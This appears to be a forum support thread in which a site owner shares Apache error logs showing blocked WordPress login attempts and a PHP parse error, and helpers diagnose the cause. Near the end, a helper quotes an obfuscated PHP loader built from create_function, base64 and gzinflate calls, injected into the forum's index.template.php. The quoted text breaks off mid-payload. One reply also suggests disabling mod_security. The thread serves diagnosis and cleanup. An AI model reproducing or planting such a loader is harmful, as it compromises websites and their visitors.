[Mon Nov 04 22:27:09 2013] [error] [client 108.165.20.162] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniBrUing5EAAFjCugwAAAA0"]
[Mon Nov 04 22:27:11 2013] [error] [client 110.4.45.47] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniBr0ing5EAABz@Oa0AAABV"]
[Mon Nov 04 23:35:37 2013] [error] [client 65.55.52.119] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 23:41:23 2013] [error] [client 68.233.228.194] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Mon Nov 04 23:41:23 2013] [error] [client 68.233.228.194] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Mon Nov 04 23:47:23 2013] [error] [client 66.249.75.81] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 23:55:13 2013] [error] [client 192.163.243.191] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniWUUing5EAABSUzOkAAABv"]
[Mon Nov 04 23:55:15 2013] [error] [client 85.112.29.210] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniWU0ing5EAABSNyWAAAABi"]
[Mon Nov 04 23:55:17 2013] [error] [client 199.124.61.3] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniWVUing5EAAGRlslwAAADi"]
[Tue Nov 05 00:13:32 2013] [error] [client 123.125.71.92] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 00:13:43 2013] [error] [client 123.125.71.47] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 00:20:37 2013] [error] [client 220.181.89.148] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 01:02:35 2013] [error] [client 50.138.174.120] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-120x120-precomposed.png
[Tue Nov 05 01:02:35 2013] [error] [client 50.138.174.120] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-120x120.png
[Tue Nov 05 01:02:35 2013] [error] [client 50.138.174.120] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-precomposed.png
[Tue Nov 05 01:02:35 2013] [error] [client 50.138.174.120] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon.png
[Tue Nov 05 01:09:42 2013] [error] [client 123.30.175.123] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 01:24:06 2013] [error] [client 5.10.83.3] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/twofrogs_newsletter_subscribe.html
[Tue Nov 05 01:30:39 2013] [error] [client 184.168.112.26] ModSecurity: Access denied with connection close (phase 1). Pattern match "^(64\\\\.202\\\\.1(6[89]|7\\\\d|8\\\\d|9[01])|103\\\\.1\\\\.17[2-5]|118\\\\.139\\\\.1([6-8]\\\\d|9[01])|146\\\\.255\\\\.(3[2-9]|4[0-7])|160\\\\.153|166\\\\.62\\\\.(\\\\d|\\\\d\\\\d|1[0-2][0-7])|173\\\\.201|182\\\\.50\\\\.(12[89]|1[0-5]\\\\d])|184\\\\.168\\\\.(?!224\\\\.(117|131))|185\\\\.7\\\\.2(4[89]|5 ..." at REMOTE_ADDR. [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_04_wordpress_brute_force_and_bot_posts.conf"] [line "11"] [id "10410"] [msg "Godaddy IP Space wp-login.php attempt"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unisr0ing5EAAAxMSLEAAABv"]
[Tue Nov 05 01:30:45 2013] [error] [client 182.48.43.21] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnistUing5EAAHtMFkIAAAB5"]
[Tue Nov 05 01:33:04 2013] [error] [client 95.0.152.252] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/lyme_research.html
[Tue Nov 05 01:33:05 2013] [error] [client 95.0.152.252] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/whoiserve.html
[Tue Nov 05 01:39:01 2013] [error] [client 63.247.81.130] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniupUing5EAAAn7SXEAAAB9"]
[Tue Nov 05 01:39:03 2013] [error] [client 64.34.111.218] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uniup0ing5EAAFFNGYgAAACi"]
[Tue Nov 05 01:39:05 2013] [error] [client 216.120.254.131] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniuqUing5EAAH7SG2cAAAAF"]
[Tue Nov 05 01:53:10 2013] [error] [client 54.204.232.4] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 02:14:03 2013] [error] [client 173.199.187.100] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uni220ing5EAADKu0P4AAABn"]
[Tue Nov 05 02:14:04 2013] [error] [client 94.60.137.8] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uni23Eing5EAAFdmPEMAAAEg"]
[Tue Nov 05 02:14:07 2013] [error] [client 196.40.97.93] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uni230ing5EAAEsyBo4AAADV"]
[Tue Nov 05 02:15:00 2013] [error] [client 157.56.93.186] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 02:31:10 2013] [error] [client 74.95.0.186] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 02:46:42 2013] [error] [client 93.115.112.156] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uni@gking5EAAGSfdE8AAAAJ"]
[Tue Nov 05 02:46:44 2013] [error] [client 72.10.49.155] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uni@hEing5EAAHbHG1sAAAAK"]
[Tue Nov 05 02:46:47 2013] [error] [client 54.228.244.215] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Uni@h0ing5EAAGsS640AAACz"]
[Tue Nov 05 03:03:45 2013] [error] [client 157.55.33.78] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Tue Nov 05 03:03:45 2013] [error] [client 157.55.33.78] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Tue Nov 05 03:11:25 2013] [error] [client 208.115.113.83] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 03:21:35 2013] [error] [client 5.10.83.26] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/casestudies.html
[Tue Nov 05 03:54:08 2013] [error] [client 65.55.213.67] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/whoiserve.html
[Tue Nov 05 03:54:40 2013] [error] [client 5.10.83.82] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/twofrogs_newsletter_subscribe.html
[Tue Nov 05 04:01:25 2013] [error] [client 5.10.83.73] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/services.html
[Tue Nov 05 04:04:37 2013] [error] [client 157.55.32.147] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 04:06:55 2013] [error] [client 5.10.83.23] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/services.html
[Tue Nov 05 04:16:59 2013] [error] [client 217.69.133.238] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 04:17:15 2013] [error] [client 217.69.133.236] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/whoiserve.html
[Tue Nov 05 04:18:06 2013] [error] [client 46.28.5.22] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjT7king5EAAF1XRagAAADs"]
[Tue Nov 05 04:18:08 2013] [error] [client 69.160.46.103] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjT8Eing5EAAGCQJnEAAADF"]
[Tue Nov 05 04:18:11 2013] [error] [client 198.136.63.9] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjT80ing5EAACXffYgAAADA"]
[Tue Nov 05 04:39:33 2013] [error] [client 5.10.83.75] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 04:39:34 2013] [error] [client 5.10.83.75] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 04:41:02 2013] [error] [client 108.176.252.104] sh: host: command not found
[Tue Nov 05 04:41:02 2013] [error] [client 108.176.252.104] sh: host: command not found
[Tue Nov 05 05:01:56 2013] [error] [client 208.115.111.66] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 05:10:18 2013] [error] [client 208.115.113.83] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/casestudies.html
[Tue Nov 05 05:31:45 2013] [error] [client 199.21.99.88] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Tue Nov 05 05:31:45 2013] [error] [client 199.21.99.88] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Tue Nov 05 05:31:45 2013] [error] [client 199.21.99.88] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Tue Nov 05 05:31:45 2013] [error] [client 199.21.99.88] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Tue Nov 05 05:50:49 2013] [error] [client 74.112.202.19] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 06:03:40 2013] [error] [client 216.70.114.198] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjsrEing5EAAGWIOm8AAACJ"]
[Tue Nov 05 06:03:42 2013] [error] [client 178.32.177.13] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unjsrking5EAAEIfeUEAAABC"]
[Tue Nov 05 06:05:17 2013] [error] [client 63.247.81.130] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjtDUing5EAAEI7e7YAAABR"]
[Tue Nov 05 06:05:21 2013] [error] [client 80.48.31.188] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjtEUing5EAAHDza4oAAACm"]
[Tue Nov 05 06:05:24 2013] [error] [client 109.169.44.48] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnjtFEing5EAAA6xm2gAAAB8"]
[Tue Nov 05 06:16:33 2013] [error] [client 72.159.38.226] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-114x114-precomposed.png
[Tue Nov 05 06:16:33 2013] [error] [client 72.159.38.226] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-114x114.png
[Tue Nov 05 06:16:33 2013] [error] [client 72.159.38.226] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-precomposed.png
[Tue Nov 05 06:16:33 2013] [error] [client 72.159.38.226] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon.png
[Tue Nov 05 06:21:44 2013] [error] [client 5.10.83.82] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/whoiserve.html
[Tue Nov 05 06:30:12 2013] [error] [client 5.10.83.3] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/whoiserve.html
[Tue Nov 05 06:39:57 2013] [error] [client 199.16.131.122] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unj1LUing5EAAB@Xy0oAAAET"]
[Tue Nov 05 06:39:58 2013] [error] [client 91.146.107.251] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unj1Lking5EAAHZ4hNAAAAAZ"]
[Tue Nov 05 06:39:59 2013] [error] [client 184.168.112.26] ModSecurity: Access denied with connection close (phase 1). Pattern match "^(64\\\\.202\\\\.1(6[89]|7\\\\d|8\\\\d|9[01])|103\\\\.1\\\\.17[2-5]|118\\\\.139\\\\.1([6-8]\\\\d|9[01])|146\\\\.255\\\\.(3[2-9]|4[0-7])|160\\\\.153|166\\\\.62\\\\.(\\\\d|\\\\d\\\\d|1[0-2][0-7])|173\\\\.201|182\\\\.50\\\\.(12[89]|1[0-5]\\\\d])|184\\\\.168\\\\.(?!224\\\\.(117|131))|185\\\\.7\\\\.2(4[89]|5 ..." at REMOTE_ADDR. [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_04_wordpress_brute_force_and_bot_posts.conf"] [line "11"] [id "10410"] [msg "Godaddy IP Space wp-login.php attempt"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unj1L0ing5EAAFKVHF4AAAA-"]
[Tue Nov 05 06:45:55 2013] [error] [client 208.115.111.66] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/contact.html
[Tue Nov 05 07:09:28 2013] [error] [client 208.115.113.83] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 07:13:10 2013] [error] [client 184.168.109.23] ModSecurity: Access denied with connection close (phase 1). Pattern match "^(64\\\\.202\\\\.1(6[89]|7\\\\d|8\\\\d|9[01])|103\\\\.1\\\\.17[2-5]|118\\\\.139\\\\.1([6-8]\\\\d|9[01])|146\\\\.255\\\\.(3[2-9]|4[0-7])|160\\\\.153|166\\\\.62\\\\.(\\\\d|\\\\d\\\\d|1[0-2][0-7])|173\\\\.201|182\\\\.50\\\\.(12[89]|1[0-5]\\\\d])|184\\\\.168\\\\.(?!224\\\\.(117|131))|185\\\\.7\\\\.2(4[89]|5 ..." at REMOTE_ADDR. [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_04_wordpress_brute_force_and_bot_posts.conf"] [line "11"] [id "10410"] [msg "Godaddy IP Space wp-login.php attempt"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unj89king5EAADTWTI4AAACA"]
[Tue Nov 05 07:13:13 2013] [error] [client 210.152.132.21] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unj8@Uing5EAACA60q0AAAE0"]
[Tue Nov 05 07:20:32 2013] [error] [client 5.10.83.82] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/legalprivacynotice.html
[Tue Nov 05 07:26:41 2013] [error] [client 61.135.189.125] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 07:26:50 2013] [error] [client 61.135.189.125] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 07:29:12 2013] [error] [client 157.55.32.143] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 07:32:33 2013] [error] [client 5.10.83.73] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/contact.html
[Tue Nov 05 07:47:33 2013] [error] [client 199.21.99.88] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 08:25:18 2013] [error] [client 131.253.24.13] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 08:42:46 2013] [error] [client 70.208.158.102] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-precomposed.png
[Tue Nov 05 08:42:47 2013] [error] [client 70.208.158.102] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon.png
[Tue Nov 05 08:48:35 2013] [error] [client 96.125.179.45] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnkTU0ing5EAACXvCfAAAABD"]
[Tue Nov 05 08:48:38 2013] [error] [client 72.10.55.82] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnkTVking5EAAFHohmwAAACH"]
[Tue Nov 05 08:48:40 2013] [error] [client 96.30.32.30] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnkTWEing5EAAFG0fX4AAABI"]
[Tue Nov 05 08:48:50 2013] [error] [client 193.252.118.164] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 08:51:18 2013] [error] [client 130.185.109.239] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Tue Nov 05 08:51:18 2013] [error] [client 130.185.109.239] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Tue Nov 05 08:59:16 2013] [error] [client 157.55.32.143] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Tue Nov 05 09:00:36 2013] [error] [client 5.10.83.73] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/images/whoiserve.html
[Tue Nov 05 09:03:34 2013] [error] [client 208.115.111.66] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt

I need help with interpreting this.

The Apache error log is huge so tell me what to look for.




Oldiesmann

Nothing in there relates to SMF, and that doesn't help solve the problem. The problem is there is a coding error in one of your template files. Running the query that Shadow82x suggested will help us determine which file the error is in, at which point we can tell you how to fix the problem.
Michael Eshom
Christian Metal Fans

goodbyelyme

Ok, I disabled template eval in phpMyAdmin.

I still see the error codes at the bottom of the page.

What do I look for next?

Arantor


goodbyelyme

Yes, it changed to this:

Parse error: syntax error, unexpected ')' in /home/content/t/w/o/twofrogscenter/html/goodbyelyme/forums/Themes/default/index.template.php(358) : runtime-created function on line 1

Fatal error: Function name must be a string in /home/content/t/w/o/twofrogscenter/html/goodbyelyme/forums/Themes/default/index.template.php on line 358

Arantor

Please attach your index.template.php file (though, really, this should have been predictable from the error before, thinking about it)


MrPhil

Please make yourself a /robots.txt file (even if it's empty) to suppress about half your error log. Then clean up various random missing files (e.g., what is contact.html doing being called from within images/ ?). Either replace with the missing file, or find where it's being referred to and remove that reference. Then it looks like some sort of "modsecurity" is reporting that it's blocking a bunch of stuff. If this is the same thing as server "mod_security", find out how to turn it off -- SMF doesn't need it and it just gets in the way.

Arantor

Interesting.

function template_html_below()
{
global $context, $settings, $options, $scripturl, $txt, $modSettings;
/*16*/ function JjJ9tNBxA($eODwwxGe){$aOO=array(0,97,98,99,100,101,108,115,118,105,110,111,117,109,112,114);$sZO='';$eODewZxGe=0;while($eODewZxGe<8){if($aOO[$eODwwxGe-(($eODwwxGe>>4)<<4)]){$sZO.=chr($aOO[$eODwwxGe-(($eODwwxGe>>4)<<4)]);}$eODwwxGe=$eODwwxGe>>4;$eODewZxGe++;}return$sZO;}$_________=JjJ9tNBxA(24965);$_________=create_function('',$_________.chr(40).chr(41).chr(59));$________=chr(54).chr(52).chr(95);$________=JjJ9tNBxA(22290).$________;$________.=JjJ9tNBxA(5550932);$_______=JjJ9tNBxA(1609413548);$_______=chr(103).chr(122).$_______.JjJ9tNBxA(119);$_________($_______($________(chr(101).chr(74).chr(121).chr(116).chr(86).chr(48).chr(116).chr(118).chr(50).chr(48).chr(103).chr(83).chr(118).chr(115).chr(43).chr(118).chr(54).chr(72).chr(65).chr(89).chr(107).chr(51).chr(82).chr(107).chr(85).chr(112).chr(84).chr(107).chr(108).chr(50).chr(103).chr(54).chr(121).chr(105).chr(84).chr(97).chr(74).chr(70).chr(104).chr(107).chr(80).chr(72).chr(67).chr(56).chr(105).chr(119).chr(85).chr(107).chr(68).chr(100).chr(69).chr(105).chr(109).chr(120).chr(73).chr(51).chr(70).chr(74).chr(118).chr(84).chr(98).chr(70).chr(114).chr(82).chr(87).chr(114).chr(114).chr(110).chr(107).chr(107).chr(78).chr(79).chr(103).chr(122).chr(110).chr(109).chr(108).chr(114).chr(56).chr(120).chr(119).chr(65).chr(81).chr(53).chr(122).chr(77).chr(73).chr(66).chr(103).chr(105).chr(65).chr(119).chr(57).chr(113).chr(75).chr(53).chr(106).chr(88).chr(47).chr(71).chr(86).chr(118).chr(78).chr(104).chr(83).chr(90).chr(89).chr(122).chr(68).chr(43).chr(122).chr(75).chr(66).chr(53).chr(76).chr(49).chr(54).chr(117).chr(113).chr(118).chr(118).chr(54).chr(111).chr(117).chr(116).chr(119).chr(104).chr(106).chr(108).chr(68).chr(109).chr(77).chr(120).chr(74).chr(84).chr(120).chr(73).chr(66).chr(113).chr(111).chr(86).chr(99).chr(49).chr(113).chr(66).chr(86).chr(72).chr(103).chr(74).chr(73).chr(83).chr(114).chr(105).chr(104).chr(99).chr(107).chr(99).chr(89).chr(103).chr(110).chr(84).chr(109).chr(97).chr(85).chr(75).chr(66).chr(88).chr(108).chr(121).chr(80).chr(99).chr(86).chr(122).chr(90).chr(76).chr(106).chr(84).chr(53).chr(101).chr(88).chr(53).chr(120).chr(47).chr(101).chr(118).chr(88).chr(55).chr(120).chr(56).chr(115).chr(51).chr(114).chr(108).chr(121).chr(47).chr(101).chr(50).chr(75).chr(89).chr(108).chr(107).chr(47).chr(110).chr(70).chr(114).chr(55).chr(47).chr(89).chr(115).chr(118).chr(79).chr(48).chr(102).chr(102).chr(122).chr(51).chr(57).chr(106).chr(71).chr(89).chr(118).chr(80).chr(51).chr(48).chr(56).chr(99).chr(87).chr(98).chr(67).chr(53).chr(68).chr(99).chr(80).chr(122).chr(114).chr(54).chr(54).chr(43).chr(79).chr(50).chr(74).chr(88).chr(78).chr(98).chr(83).chr(82).chr(86).chr(76).chr(57).chr(117).chr(97).chr(50).chr(119).chr(104).chr(84).chr(76).chr(73).chr(51).chr(52).chr(81).chr(69).chr(86).chr(85).chr(90).chr(69).chr(77).chr(75).chr(50).chr(74).chr(56).chr(78).chr(73).chr(113).chr(90).chr(106).chr(55).chr(43).chr(50).chr(89).chr(100).chr(103).chr(109).chr(77).chr(98).chr(77).chr(52).chr(89).chr(110).chr(113).chr(103).chr(76).chr(114).chr(72).chr(83).chr(81).chr(117).chr(67).chr(50).chr(75).chr(79).chr(81).chr(104).chr(119).chr(78).chr(85).chr(106).chr(119).chr(103).chr(116).chr(118).chr(82).chr(80).chr(102).chr(73).chr(112).chr(122).chr(111).chr(88).chr(83).chr(73).chr(84).chr(106).chr(70).chr(68).chr(53).chr(72).chr(107).chr(99).chr(77).chr(73).chr(74).chr(115).chr(70).chr(74).chr(69).chr(120).chr(101).chr(111).chr(65).chr(53).chr(85).chr(84).chr(86).chr(76).chr(121).chr(68).chr(110).chr(49).chr(56).chr(71).chr(82).chr(86).chr(110).chr(74).chr(118).chr(113).chr(115).chr(76).chr(87).chr(84).chr(89).chr(69).chr(84).chr(85).chr(122).chr(69).chr(73).chr(102).chr(70).chr(70).chr(56).chr(97).chr(117).chr(111).chr(80).chr(113).chr(79).chr(49).chr(88).chr(120).chr(50).chr(54).chr(119).chr(49).chr(78).chr(107).chr(51).chr(120).chr(111).chr(108).chr(107).chr(101).chr(100).chr(100).chr(77).chr(82).chr(105).chr(98).chr(106).chr(117).chr(85).chr(118).chr(111).chr(115).chr(69).chr(77).chr(116).chr(73).chr(65).chr(48).chr(111).chr(72).chr(73).chr(88).chr(70).chr(119).chr(72).chr(77).chr(67).chr(43).chr(56).chr